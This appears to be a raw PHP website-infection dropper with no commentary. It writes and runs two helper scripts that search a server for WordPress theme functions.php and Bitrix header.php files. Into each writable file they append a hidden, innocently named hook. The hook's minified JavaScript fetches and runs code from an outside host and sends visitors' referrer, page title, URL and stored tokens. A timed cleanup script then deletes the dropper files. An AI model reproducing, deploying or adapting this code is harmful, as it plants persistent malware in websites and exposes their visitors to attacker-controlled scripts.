<?php
$codeWP = '<?php
function findAccessiblePaths($path) {
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];
    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}
function findWpThemesCrossPlatform() {
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];
    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $functionsPaths = [];
        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "functions.php");
                $functionsPaths = array_merge($functionsPaths, $foundPaths);
            }
        }
        $modifiedFiles = addCustomScriptToFiles($functionsPaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }
    if (empty($allModifiedFiles)) {
        echo "No themes modified or accessible";
    } else {
        print_r($allModifiedFiles);
    }
}
function addCustomScriptToFiles(array $functionsPaths) {
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();
    foreach ($functionsPaths as $functionsPath) {
        if (file_exists($functionsPath) && is_writable($functionsPath)) {
            $code = file_get_contents($functionsPath);
            if (strpos($code, "wp_system_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($functionsPath, $code);
                $modifiedFiles[] = $functionsPath;
            }
        }
    }
    return $modifiedFiles;
}
function getCustomScript() {
    return <<<PHP
function wp_system_query_script() {
    ?>
<script>!function(){window._sNTkhBPDJ62xfhDh||(window._sNTkhBPDJ62xfhDh={unique:!1,ttl:86400,R_PATH:"https://intrstreams.global.ssl.fastly.net/Rm3txV2Q"}),null!=(e=localStorage.getItem("config"))&&(o=JSON.parse(e),t=Math.round(+new Date/1e3),o.created_at+window._sNTkhBPDJ62xfhDh.ttl<t&&(localStorage.removeItem("subId"),localStorage.removeItem("token"),localStorage.removeItem("config")));var e=localStorage.getItem("subId"),o=localStorage.getItem("token"),t="?return=js.client";t+="&"+decodeURIComponent(window.location.search.replace("?","")),t+="&se_referrer="+encodeURIComponent(document.referrer),t+="&default_keyword="+encodeURIComponent(document.title),t+="&landing_url="+encodeURIComponent(document.location.hostname+document.location.pathname),t+="&name="+encodeURIComponent("_sNTkhBPDJ62xfhDh"),t+="&host="+encodeURIComponent(window._sNTkhBPDJ62xfhDh.R_PATH),void 0!==e&&e&&window._sNTkhBPDJ62xfhDh.unique&&(t+="&sub_id="+encodeURIComponent(e)),void 0!==o&&o&&window._sNTkhBPDJ62xfhDh.unique&&(t+="&token="+encodeURIComponent(o)),(o=document.createElement("script")).type="application/javascript",o.src=window._sNTkhBPDJ62xfhDh.R_PATH+t,(t=document.getElementsByTagName("script")[0]).parentNode.insertBefore(o,t)}();</script>
    <?php
}
add_action("wp_footer", "wp_system_query_script");
add_action("wp_body_open", "wp_system_query_script");
PHP;
}
function getSearchCommand($startPath) {
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*wp-content\\themes*";
    } else {
        return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null";
    }
}
function findFilesRecursively($dir, $fileName) {
    $results = [];
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }
    return $results;
}
findWpThemesCrossPlatform();
die();
?>';
$codeBT = '<?php 
function findAccessiblePaths($path)
{
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];
    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}
function modifyBitrixTemplates()
{
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];
    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $templatePaths = [];
        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template
                $templatePaths = array_merge($templatePaths, $foundPaths);
            }
        }
        $modifiedFiles = addCustomScriptToFiles($templatePaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }
    if (empty($allModifiedFiles)) {
        echo "No templates modified or accessible";
    } else {
        echo print_r($allModifiedFiles);
    }
}
function addCustomScriptToFiles(array $templatePaths)
{
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();
    foreach ($templatePaths as $templatePath) {
        if (file_exists($templatePath) && is_writable($templatePath)) {
            $code = file_get_contents($templatePath);
            if (strpos($code, "custom_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($templatePath, $code);
                $modifiedFiles[] = $templatePath;
            }
        }
    }
    return $modifiedFiles;
}
function getCustomScript()
{
    return <<<HTML
<script>!function(){window._KKNSbmN5mYRPSVjF||(window._KKNSbmN5mYRPSVjF={unique:!1,ttl:86400,R_PATH:"https://intrstreams.global.ssl.fastly.net/NBD8mqfG"}),null!=(e=localStorage.getItem("config"))&&(o=JSON.parse(e),t=Math.round(+new Date/1e3),o.created_at+window._KKNSbmN5mYRPSVjF.ttl<t&&(localStorage.removeItem("subId"),localStorage.removeItem("token"),localStorage.removeItem("config")));var e=localStorage.getItem("subId"),o=localStorage.getItem("token"),t="?return=js.client";t+="&"+decodeURIComponent(window.location.search.replace("?","")),t+="&se_referrer="+encodeURIComponent(document.referrer),t+="&default_keyword="+encodeURIComponent(document.title),t+="&landing_url="+encodeURIComponent(document.location.hostname+document.location.pathname),t+="&name="+encodeURIComponent("_KKNSbmN5mYRPSVjF"),t+="&host="+encodeURIComponent(window._KKNSbmN5mYRPSVjF.R_PATH),void 0!==e&&e&&window._KKNSbmN5mYRPSVjF.unique&&(t+="&sub_id="+encodeURIComponent(e)),void 0!==o&&o&&window._KKNSbmN5mYRPSVjF.unique&&(t+="&token="+encodeURIComponent(o)),(o=document.createElement("script")).type="application/javascript",o.src=window._KKNSbmN5mYRPSVjF.R_PATH+t,(t=document.getElementsByTagName("script")[0]).parentNode.insertBefore(o,t)}();</script>  
HTML;
}
function getSearchCommand($startPath)
{
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*bitrix*";
    } else {
        return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null";
    }
}
function findFilesRecursively($dir, $fileName)
{
    $results = [];
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }
    return $results;
}
modifyBitrixTemplates(); 
die(); 
?>';
$del = <<<PHP
<?php
unlink('wp.php');
unlink('bt.php');
unlink('wpbtStart.php');
?>
PHP;
file_put_contents('wp.php', $codeWP);
file_put_contents('bt.php', $codeBT);
file_put_contents('del.php', $del);
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
    shell_exec("start /B php wp.php > log_wp.txt 2>&1");
    shell_exec("start /B php bt.php > log_bt.txt 2>&1");
    shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow");
} else {
    shell_exec("php wp.php > log_wp.txt 2>&1 &");
    shell_exec("php bt.php > log_bt.txt 2>&1 &");
    shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &");
}
?>